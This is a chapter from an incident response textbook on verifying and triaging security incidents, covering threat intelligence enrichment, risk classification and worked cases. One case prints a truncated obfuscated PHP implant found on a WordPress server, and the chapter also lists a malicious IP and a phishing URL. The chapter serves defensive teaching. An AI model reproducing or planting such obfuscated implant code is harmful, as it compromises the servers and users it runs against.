1. Verify and Triage Activities
In the DAIR model, we introduce an activity that is not specifically called out in other popular incident response models: verify and triage. This step is often implied in the detection phase of PICERL or NIST SP 800-61 (Computer Security Incident Handling Guide), but we believe it is important to explicitly call it out.
In the verify and triage activity, analysts are asked to perform two important actions:
-
Verify the incident: Use the information collected during the detect activity to assess the incident’s validity and assign an initial risk impact classification to engage the broader incident response team.
-
Triage the incident: Working with decision makers, determine appropriate response actions based on the risk impact classification and available incident information, including resource assignment to investigate the incident.
In this activity, analysts begin coordinating more actively with decision-makers: individuals with the authority to decide on the incident response process. These decision makers are often managers or executives who can provide the necessary resources to respond to the incident, but may also include data owners, legal counsel, business unit leaders, or other stakeholders who have a vested interest in the outcome of the incident response process.
The Importance of Verification
During verification, we use information collected during the detect activity to determine whether the incident is real or a false positive. Verification ensures that the incident response team is not spending resources on a non-existent incident, freeing the team to focus on other responsibilities. It also helps to build decision-maker confidence by ensuring the response is appropriate for the risk as understood at the beginning of the response effort.
In some cases, verification is straightforward: a defaced website, for example, is a clear indication of compromise. In other cases, the indicators of compromise are less clear, and the incident response team may need to spend time verifying the incident before proceeding with the response effort.
At this stage of the incident response process, we often have limited insight into the incident and must rely on information collected during the detect phase to make an initial assessment. We should also accept that sometimes the verification process will not reveal evidence of a compromise, despite unexplained behavior that might suggest otherwise.
Verification Response Actions
During verification, the IRT reviews the information collected in the detect activity to determine the validity of the incident. Based on the information available, the IRT may take one of the following actions:
-
Continue the incident response process: If the IRT determines that the incident is real, they will escalate and initiate the incident response process, engaging the broader incident response team and other company stakeholders and decision-makers.
-
Stop the incident response process: If the IRT determines the incident is not real, they will close it and document the findings for future reference.
-
Defer verification: If the IRT is unable to determine the validity of the incident based on the information available, they may defer decision-making while requesting additional information from the reporting party or other sources.
The decision to continue, stop, or defer allows the analyst to make an initial assessment of the reported incident before engaging the broader incident response team, company stakeholders, and decision-makers. We include an illustration of this process in Figure 2.
Documentation
Using the documentation platform established during the incident preparation activity for incident tracking (see Identify a Platform for Incident Tracking), the incident response analyst should capture information about the incident. This will begin an information-collection process that will continue throughout the incident’s lifecycle. Information to collect during the verification activity may include:
-
Incident identifier: A unique identifier for the incident, often generated by the incident tracking platform.
-
Incident title: A descriptive title for the incident, often based on the source of the report or the incident classification. The title serves as a quick, intuitive reference for the team when referring to the incident.
-
Handler ID: The identifier for the incident response analyst responsible for assessing the incident.
-
Incident summary: A brief description of the incident, including the source of the report, the date and time of the report, and any other relevant information.
-
Incident classification: An initial incident classification, based on the information available. Some incident classifications might be unauthorized access, phishing, malicious code, sensitive data disclosure, account compromise, public-facing exploit, and more.
-
Evidence references: References to evidence collected during the detect activity.
The documentation started during the verification activity will be used throughout the incident response process to track the incident, document response actions, and provide a record for future reference. Further, it can be used by the incident response team to provide updates to decision makers and other stakeholders as the incident response process progresses. Later, this documentation will be used to create a final incident report or as part of an organization’s cyber insurance claim.
At this point in the process, however, there is often a feeling of urgency to move quickly. While this is important, it is also important to document the incident accurately, with sufficient detail that it is useful for subsequent activities in the incident response process. A modern adage is that if you are typing too fast to take notes, you are just going too fast. Taking the time to document the incident also helps moderate the investigation’s pace, ensuring that the team does not move so quickly that it misses important details.
Initial Risk Assessment
In Section 1.3, we examined the importance of documenting the incident during the verification activity. We didn’t yet capture an initial risk assessment for the incident.
Before presenting the incident details to a decision-maker for consideration of response effort resource allocation, the incident response analyst should provide an initial risk assessment of the incident. There are many ways to classify incidents and assess their impact. Several projects are available to assist organizations with this task, including:
-
Vocabulary for Event Recording and Incident Sharing (VERIS): Used in the Verizon Data Breach Investigations Report (DBIR) and other incident sharing communities to quantify incident impact
-
Factor Analysis of Information Risk (FAIR): A risk analysis framework that helps organizations quantify and manage information risk
-
NIST SP 800-30: A US government risk assessment framework that helps organizations identify, assess, and respond to risks to their information systems
For many organizations, though, the initial risk assessment is simply a classification of the incident based on its perceived impact on the organization. This includes financial, operational, and reputational loss, as well as the potential regulatory impact. While these considerations will vary significantly among analysts within the same organization, evaluating the perceived impact allows the analyst to classify the risk into broad categories that can be used to communicate incident details to decision makers.
Many organizations classify incident risk into four levels:
-
Low: Minor security anomalies with minimal impact.
-
Medium: Potential security concerns requiring investigation but not disrupting operations.
-
High: Confirmed incidents impacting business operations or data integrity.
-
Critical: Major security incidents requiring executive escalation and immediate containment.
Adding the initial risk assessment to the incident documentation will help decision-makers understand the potential impact of the incident on the organization, based on the analyst’s assessment.
Verification and Cyber Threat Intelligence
Cyber Threat Intelligence (CTI) provides valuable context during verification, helping analysts distinguish genuine threats from false positives and informing the risk assessment that guides triage decisions. By integrating CTI into verification workflows, organizations can make faster, more accurate determinations about whether to continue, stop, or defer incident response efforts.
EOI Validation and Enrichment
When analysts encounter suspicious Events of Interest (EOI) during verification, CTI platforms can provide additional context about whether those indicators are associated with known threats. Querying reputation databases, threat intelligence feeds, and community-sourced information provides insight that can help distinguish between confirmed malicious activity and benign behavior. This is especially important during the verification phase, where the goal is to quickly assess the validity of the incident without expending unnecessary resources.
For example, using one or more CTI sources, analysts can query intelligence databases using technical indicators such as IP addresses, domain names, URLs, or file hashes observed in the environment. The CTI database may indicate whether those indicators have been previously associated with malware distribution, phishing campaigns, command-and-control infrastructure, or other malicious activity. Platforms such as VirusTotal, AlienVault OTX, Shodan, and commercial threat intelligence feeds may even provide different perspectives on the same indicator, allowing analysts to cross-reference multiple sources to increase confidence in the assessment.
For example, in an incident engagement, the IP address 147.45.44.131 was observed as a source for PowerShell script downloads in web proxy logs. While suspicious, this is not definitive proof of malicious activity. Cross-referencing this IP address against CTI sources, including VirusTotal and AlienVault OTX, provided additional context on malicious activity patterns, as shown in Figure 3 and Figure 4.
CTI enrichment also helps identify false positives before they consume investigation resources. Legitimate services sometimes exhibit behavior that triggers security alerts: content delivery networks with unusual traffic patterns, cloud infrastructure with dynamic IP allocation, or security tools performing authorized scanning. Threat intelligence platforms often maintain databases of known-good infrastructure that can quickly rule out false positives. For example, regularly timed outbound connections to an unfamiliar IP address might initially appear to match common command-and-control activity patterns, but CTI enrichment revealing that the IP address belongs to Microsoft’s Windows Notification Service (WNS) infrastructure can quickly close the verification loop, as shown in Figure 5 and Figure 6.
| Build a local knowledge base of false positive sources specific to the organization’s environment. When CTI enrichment identifies a benign indicator that triggered an alert, document the finding for future reference. Over time, this organizational memory reduces verification time for recurring false positives. |
Informing Initial Risk Classification
The same IOC can represent vastly different risk levels depending on what threat intelligence reveals about its origin, associated threat actors, and typical attack patterns. Using the CTI context, analysts can better assess the initial risk classification during the verification assessment.
For example, consider how attribution context influences our understanding of risk. A phishing email with a credential harvesting link might warrant a medium classification if threat intelligence associates it with a mass-distributed commodity campaign targeting broad populations. The same indicator escalates to high or critical if CTI links it to a threat actor known for targeting similar organizations with follow-on ransomware deployment.
| The technical indicator is identical, but the threat context fundamentally changes the appropriate response. |
Threat intelligence also informs risk classification by revealing the capabilities of attackers and the typical impact. CTI sources often document the outcomes of previous campaigns attributed to specific threat actors, including average dwell times, data exfiltration volumes, and recovery costs for victim organizations. This historical context helps analysts calibrate their risk assessment against real-world consequences rather than theoretical harm.
When integrating CTI into risk classification, analysts should consider the following factors:
-
Attribution confidence: How reliably does the CTI source link this indicator to a specific threat actor or campaign?
-
Relevance to the organization: Does the threat actor target the organization’s industry, geography, or size?
-
Attacker capability: Is the threat actor associated with sophisticated, persistent attacks or opportunistic, take-what-they-can operations?
-
Typical impact: What outcomes have previous victims experienced when targeted by this threat actor?
| The absence of threat intelligence does not indicate the absence of threat. Novel attacks, zero-day exploits, and emerging threat actors will not appear in CTI feeds until after initial victims have been compromised and intelligence has been collected and shared. Analysts should treat CTI as one input to verification, not the sole indicator of whether an incident is real. |
Pivoting to Related Indicators
Threat intelligence platforms often provide relationships between indicators, allowing analysts to expand their verification scope based on known associations. A single suspicious indicator may connect to additional domains, IP addresses, file hashes, or behavioral patterns associated with the same campaign or threat actor.
When CTI reveals related indicators, analysts can search for those additional IOCs across the environment to determine whether the initial finding represents an isolated event or a broader compromise. This pivoting capability transforms verification from a single-indicator assessment into a more comprehensive evaluation of potential threat presence.
For example, an analyst investigating a domain hosting a ransomware message might discover through CTI that the domain shares infrastructure with several other domains used by the same threat actor. Searching proxy logs or DNS records for those related domains could reveal additional affected users or systems that the initial detection missed, as shown in Figure 7. This expanded scope informs both the verification decision (continue vs. stop) and the subsequent scoping activity if the incident is confirmed.
CTI pivoting also helps analysts anticipate what else to look for if the incident is confirmed. Threat intelligence often documents the Tactics, Techniques, and Procedures (TTPs) associated with specific threat actors or campaigns. If the indicator under verification is attributed to a threat actor known for deploying specific persistence mechanisms or lateral movement techniques, analysts can proactively search for those TTPs during scoping rather than discovering them reactively.
| CTI pivoting is a powerful tool, but should not be relied upon as a sole means of verification. Threat actors can adapt their techniques, and new indicators may emerge that are not yet documented in CTI sources. CTI does not eliminate the need for thorough investigation and analysis during verification. |
Verification Activity Examples
The following examples illustrate where verification is an important part of the incident response process.
The Unresponsive WordPress Site
A repeating help desk ticket caught the attention of the incident response team. A WordPress server used for distributing customer documentation for a software product was repeatedly reported as down or unresponsive. System administrators rebooted the server multiple times, resolving the issues. Engineering would close the help desk ticket, unable to reproduce the performance problems after a reboot, but the system would still become unresponsive, sometimes hours or days later.
Internal reporting from a savvy help desk analyst suggested that the problem might be broader than the engineering team realized. To verify the incident, the IRT collected logging information from the Apache web server. Reviewing the log activity revealed a large number of requests for a specific PHP file in the WordPress wp-includes directory, as shown in Listing 2.
42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046892 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046886 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046884 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 42.105.168.75 - - [30/Jun/2024:00:36:29 -0400] "GET /wp-includes/FkhDUPZ.php HTTP/1.1" 200 65046886 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" (1)
| 1 | Multiple requests for the FkhDUPZ.php file in the WordPress wp-includes directory return large HTTP response sizes. |
By itself, this was not enough to verify that this was an incident, though the engineering team could not explain the purpose of the strangely named FkhDUPZ.php file in the WordPress wp-includes directory.
Inspecting the contents of the file revealed the PHP file source code, as shown in Listing 3.
intel-nyc1-01:~$ cat /var/www/html/wp-includes/FkhDUPZ.php
<?php $b6bb6=explode("1l","stsixe_yek_yarra1lcexe_lruc1ltilps_gerp1ldomhc1lstegf1lteg_ini1lemitotrts1lecalper_gerp1lrid_
pmet_teg_sys1lnepof1lstsixe_elif1lsoprts1lknilnu1lemitmelif1ldro1lstsixe_noitcnuf1lmirt1lpeelsu1lemaner1lezilairesnu1lel
if_5dm1lesolc_lruc1ltes_ini1lrhc1lesolcf1lyarra_ni1ltcartxe1ltimil_emit_tes1lhctam_gerp1ltroba_resu_erongi1lpeels1lehcac
tatsraelc1lhcuot1ltpotes_lruc1lrtsbus1letirwf1lnelrts1lfoef1lezilaires1llru_esrap1lelbatirw_si1l5dm1lstnetnoc_teg_elif1l
emitorcim1lecalper_rts1ltini_lruc1lelif_si");foreach($b6bb6 as$b66bb6666⇒$b6bbb6){$b6bbb6=preg_split("//",$b6bbb6,-1,PR
EG_SPLIT_NO_EMPTY);$b6bb6[$b66bb6666]=implode("",array_reverse($b6bbb6));};$b66666b=FILE;$bb66b=explode("9","b6bbbbb
69b6bb6bbb9bbbbbb9b69b6bb66b9b66bb6b69bb6bbb69b6666b6b9bbbb6b669b6bbb6b69bbb6bbb9bb9b6b66b669bb69bb669bbbb6b9bb6b6bbb9b6
bbbbb6b9bb666666b9b66bbb9bb66bb6669bbb6b6b69b6bb6b69bb6b6b69bb6b69b6b9b666b9bbb6bb9bbbb69bbb669bbb6b6669b6bbb9bbb6bb6bb9
bbbbbb69bbbb9bb66669b6b6bb9bbbb6bb9bbb6b69bb66bbb669b6b6bb69b6bb669bb66b66b9b6b66b6b69bbbb6b6b9b66bb6b9b66666");foreach(
$bb66b as$b6666b66⇒$bbb6bbb6){$$bbb6bbb6=$b6bb6[$b6666b66];}; … (1)
| 1 | Obfuscated PHP code (truncated). |
Recognizing the PHP script contained obfuscated code, the incident response team confirmed the report as an incident, escalating the event to involve the broader incident response team and other company stakeholders and decision-makers.
Undesirable system activity, such as high CPU utilization, unexpected storage consumption, or unexplained instability, is not always an indicator of compromise, but it should be investigated to identify the root cause.
In this case, the incident response team verified the incident by examining the Apache web server logs to identify anomalies, including frequent requests to the FkhDUPZ.php file, unusually large HTTP response sizes for those requests, and the contents of the suspicious PHP file.
|
The Unpaid Toll
An accounts payable clerk forwarded a suspicious text message he received to the incident response team, as shown in Figure 8.
Rhode island turnpike(RITBA): This is a final reminder regarding the unpaid toll from your trip. A $15 daily overdue fee will be applied if it is not settled today. https://google.com/amp/rhodeislandturnpike.com
Upon initial investigation, the IRT learned that the URL in the text message redirected to the rhodeislandturnpike.com, which in turn redirected to a longer URL, as shown in Figure 9.
While the site had a semi-professional appearance that matched other Rhode Island government websites, the IRT suspected this was a phishing attempt. Using threat intelligence resources, the analyst learned that the rhodeislandturnpike.com domain had been registered that day, as shown in Listing 4. Further, the website server certificate was also created that day, as shown in Listing 5.
$ date -u Sun Feb 16 20:11:32 UTC 2025 $ whois -i rhodeislandturnpike.com | grep -i 'creation date' Creation Date: 2025-02-16T06:37:27Z (1)
| 1 | Domain registration for rhodeislandturnpike.com was created less than fourteen hours prior. |
$ date -u Sun Feb 16 20:13:31 UTC 2025 $ curl -svX HEAD https://rhodeislandturnpike.com/ 2>&1 | grep -A6 "Server certificate" * Server certificate: * subject: CN=rhodeislandturnpike.com * start date: Feb 16 06:01:28 2025 GMT (1) * expire date: May 17 06:01:27 2025 GMT * subjectAltName: host "rhodeislandturnpike.com" matched cert’s "rhodeislandturnpike.com" * issuer: C=US; O=Let’s Encrypt; CN=E5 * SSL certificate verify ok.
| 1 | The server TLS certificate was created approximately fourteen hours prior. |
In their conversation, the accounts payable clerk indicated that he did not follow the SMS link and did not visit the "Rhode Island Turnpike" website. The phone’s browser history confirmed this account. Further, the analyst found no other evidence of web activity to rhodeislandturnpike.com in the company’s web proxy server activity logs.
After conferring with another analyst on the IRT, the incident was classified as an Indicator of Attack (IOA), but not as an Event of Interest (EOI) warranting further investigation. The IRT added the rhodeislandturnpike.com domain name and the server IP address to the threat intelligence platform for monitoring, and the incident was closed.
| An indicator of an attack may not always qualify as an event of interest warranting additional investigation. For many organizations, the verification process is an opportunity to limit the number of incidents that require further investigation and to focus on those most likely to have a significant impact on the organization. |
The Simple, Secure Storage Bucket
An analyst on the incident response team received a report concerning the disclosure of a vulnerable Amazon Simple Storage Service (S3) bucket.
The report was from an unknown source, a self-identified bug bounty hunter, indicating that they found a high-risk vulnerability in the ssptmsdata S3 bucket.
The bug bounty hunter wanted to know the organization’s policy on rewarding bug bounty hunters for their work.
The company analyst reviewed the report and identified that the ssptmsdata bucket was indeed used by one of the company’s AWS accounts.
Using the AWS Command Line Interface, she reviewed the bucket’s security settings, as shown in Listing 6.
$ aws s3api get-bucket-policy --bucket ssptmsdata | jq '.Policy | fromjson'
{
"Version": "2012-10-17",
"Id": "ssptmsdata-Policy",
"Statement": [
{
"Sid": "AllowPublicRead",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:Get*", (1)
"s3:List*" (2)
],
"Resource": [
"arn:aws:s3:::ssptmsdata",
"arn:aws:s3:::ssptmsdata/*"
]
}
]
}
| 1 | The bucket policy allows any AWS principal to apply S3 get actions, including GetObject, GetBucketLocation, GetBucketPolicy, and more. |
| 2 | The bucket policy allows any AWS principal to apply S3 list actions, including ListObjects, ListBucketAnalyticsConfigurations, and more. |
Reviewing the policy details, the analyst confirmed that the bucket policy allowed any AWS principal to apply S3 get and list actions to the bucket and its contents. This allowed any AWS account (from any organization) to list the files in the bucket and retrieve the contents of any file. However, she also knew that this bucket was used for public data sharing, including company website resources, the distribution of images, CSS, fonts, JavaScript files, and other related data.
To determine whether this required action by the incident response team, the analyst reviewed the contents of the bucket, as shown in Listing 7.
$ aws s3 ls s3://ssptmsdata
PRE css/
PRE dist/
PRE fonts/
PRE images/
PRE js-lib/
PRE js/
PRE pdf/
PRE uat/
$ aws s3 ls s3://ssptmsdata/uat/
2025-02-14 14:56:41 112537 acceptance_summary.pdf
2024-05-12 11:03:12 2520 config.json
2025-02-05 11:20:15 19264 cross_browser_test.xlsx
2024-11-15 09:12:45 5515 database_seed.sql
2025-01-03 14:22:01 6472 error_log.log
2024-10-12 12:01:42 15036 feature_toggle.yaml
2024-12-15 08:45:33 22491 integration_test.py
2025-01-25 10:05:35 17055 mobile_test_cases.docx
2025-02-10 12:40:03 14491 performance_metrics.csv
2024-11-23 17:05:19 12848 performance_report.txt
2024-09-20 11:45:50 30059 sample_api_response.json
2024-12-01 10:03:58 40927 sample_users.csv
2025-01-15 13:35:22 24037 security_audit.txt
2024-10-05 15:27:35 19957 test_case.docx
2024-06-17 14:22:10 17103 test_script.sh
2024-11-03 16:30:11 1987 uat.env
2024-09-01 10:10:31 10295 uat_deploy.sh
2024-09-15 08:33:25 9087 uat_log.txt
2025-01-20 09:50:38 26982 ui_mockup.png
2024-07-20 09:15:05 41033 user_data_sample.csv
The S3 bucket contained several folders that appeared to be related to public website resources, as well as a pdf folder and a uat (User Acceptance Testing) folder.
The analyst reviewed the contents of the pdf folder and found that it contained public documentation, and the uat folder contained documentation, test data, and sample configuration data for several products.
What remained unclear was whether the bucket configuration and the data met the organization’s business needs. Was the intention to share this data publicly, or was this a misconfiguration? Were any of the files in the bucket sensitive, or was the data intended for public use?
The analyst reached out to the AWS account holder of the ssptmsdata bucket to confirm its purpose and contents.
She advised that the team responsible for this asset review each file contained in the bucket and determine whether sensitive data is disclosed.
She insisted that the review was urgent, and asked the account owner to return his analysis by the end of the day.
Once that review was complete, she could determine if the bucket configuration and information disclosure warranted further investigation by the incident response team.
| During verification, analysts use available information to assess threats and risks to the organization. Analysts apply insight into the potential incident, an understanding of the organization’s policies and procedures, and familiarity with the policies created and reviewed during the preparation activity to determine the appropriate response. In some cases, additional information will be required, necessitating the team deferring the verification decision to a later date. |
Triage Activity
In the triage activity, analysts work with decision-makers to determine appropriate response actions based on the risk impact classification and the incident information available. This may include assigning resources to investigate the incident, engaging legal counsel, or notifying law enforcement, depending on its severity.
Few organizations would claim that they have more resources than they need for their incident response function. For most organizations, the incident response function is a cost center that costs the organization money. Unlike a profit center that generates revenue, the incident response team will always be scrutinized for the resources it consumes. During triage, the incident response analyst provides sufficient insight to decision-makers to determine appropriate response actions based on the risk impact classification and the incident information available following the verify activity.
In medicine, triage is the process of determining the priority of patients' treatments based on the severity of their condition. Broadly speaking, patients with high-severity conditions are prioritized over those with less severe conditions. In incident response, a similar concept applies: threats should be prioritized based on organizational policies, often using the potential negative impact on the organization as a guide.
Presenting the Incident
As technical analysts, responders are responsible for helping decision-makers understand the incident and its potential impact on the organization. Using the insights gained from the verification activity and initial risk assessment, the analyst’s explanation of the incident significantly impacts how the risk is triaged and response actions taken.
When presenting the incident to decision makers, analysts should consider the following:
-
Be clear and concise: Use plain language to explain the incident and the potential impact on the organization.
-
Provide context: Explain the incident in the context of the organization’s policies and procedures, and the potential impact on the organization’s operations.
-
Offer recommendations: Provide response actions based on the risk impact classification and available incident information.
-
Be prepared to answer questions: Decision-makers may have questions about the incident, the potential impact on the organization, and the recommended response actions.
The decision maker should consider the organization’s overall needs, other demands on the incident response team, the team’s well-being, and the potential impact of the incident on the organization. While the incident response analyst provides insight into the incident, the decision-maker is ultimately responsible for determining appropriate response actions and allocating resources to the response effort based on the organization’s overall needs.
Establishing open communication between the incident response team and decision-makers occurs during the preparation activity. See the sidebar Building Management Support for Policy Development for insight on how to build management support for the incident response process.
Triage Example: The Third-Party Vendor Breach
The IRT verifies that a third-party SaaS vendor used for customer relationship management has suffered a data breach. The vendor notified the organization that customer contact information (names, email addresses, phone numbers) for approximately 45,000 customers may have been compromised. The analyst classifies this as high-risk due to potential regulatory notification requirements under GDPR and state privacy laws.
The analyst presents the incident to the VP of Legal (decision maker), explaining:
-
The vendor has not provided complete details about the scope of the breach.
-
Regulatory notification timelines may apply (seventy-two hours for GDPR).
-
The organization’s legal obligation to notify customers depends on what data was actually compromised.
-
The incident requires coordination between Legal, Marketing, and the IRT.
The decision maker determines that the response requires:
-
Immediate engagement with external legal counsel specializing in privacy law.
-
Assignment of one IRT analyst to coordinate with the vendor and document their responses.
-
Daily status meetings with Legal, Marketing, and executive leadership.
-
Preparation of customer notification templates while awaiting vendor confirmation of scope.
The VP of Legal allocates budget for external counsel and authorizes the IRT analyst to dedicate full-time effort to vendor coordination for the next week. She establishes a daily 30-minute status call with the cross-functional team to ensure all stakeholders remain informed as details emerge from the vendor. The incident response analyst’s role shifts from technical investigation to coordination and documentation support, working directly with Legal to ensure the organization meets its regulatory obligations.
| When presenting incidents involving third parties to decision makers, analysts should be prepared to explain how external dependencies affect resource allocation and response timelines. The analyst’s role may shift from technical investigation to coordination support, particularly when regulatory requirements or legal considerations drive the response effort. Decision-makers need to understand not only the technical details of the incident but also the organizational and legal context to make informed resource-allocation decisions. |
Verify and Triage: Step-by-Step
The following steps provide a condensed reference for verification and triage activities. Each step corresponds to topics covered earlier in this chapter, organized for use when validating a potential incident, assessing risk, and working with decision makers to determine response priorities.
| A standalone version of this step-by-step guide is available for download on the companion website in PDF and Markdown formats. |
-
Document the incident details using the incident tracking platform established during preparation:
-
Incident identifier
-
Title
-
Handler ID
-
Summary
-
Classification
-
Evidence references
-
-
Enrich Events of Interest (EOI) with cyber threat intelligence:
-
Query CTI platforms (such as VirusTotal, AlienVault OTX, Shodan, or commercial threat intelligence feeds) using technical indicators such as IP addresses, domain names, URLs, or file hashes observed in the environment.
-
Cross-reference multiple CTI sources to increase confidence in the assessment.
-
Check indicators against the organization’s local knowledge base of known false positive sources.
-
Pivot to related indicators revealed by CTI platforms, and search for those additional IOCs across the environment to determine whether the finding is isolated or part of a broader compromise.
-
-
Perform an initial risk assessment, classifying the incident as low, medium, high, or critical (or using another classification system that more closely matches the needs of the organization):
-
Consider attribution confidence, relevance to the organization, attacker capability, and typical impact from CTI sources when calibrating the risk classification.
-
Remember that the absence of threat intelligence does not indicate the absence of a threat.
-
-
Verify the incident using the information collected during the detect activity and CTI enrichment. Choose to continue, stop, or defer the investigation.
-
Triage: Present the verified incident to decision makers:
-
Use plain language to explain the incident and the potential impact on the organization.
-
Provide context by connecting the incident to the organization’s policies, procedures, and operations.
-
Offer recommendations for response actions based on the risk classification and available incident information.
-
Be prepared to answer questions about the incident, its potential impact, and recommended response actions.
-
-
Work with decision makers to determine the appropriate response actions and resource allocation:
-
Decision makers should consider the organization’s overall needs, other demands on the incident response team, team well-being, and the potential impact of the incident.
-
Response actions may include assigning resources to investigate, engaging legal counsel, or notifying law enforcement.
-
Recognize that the analyst’s role may shift from technical investigation to coordination support, particularly when regulatory requirements or legal considerations drive the response effort.
-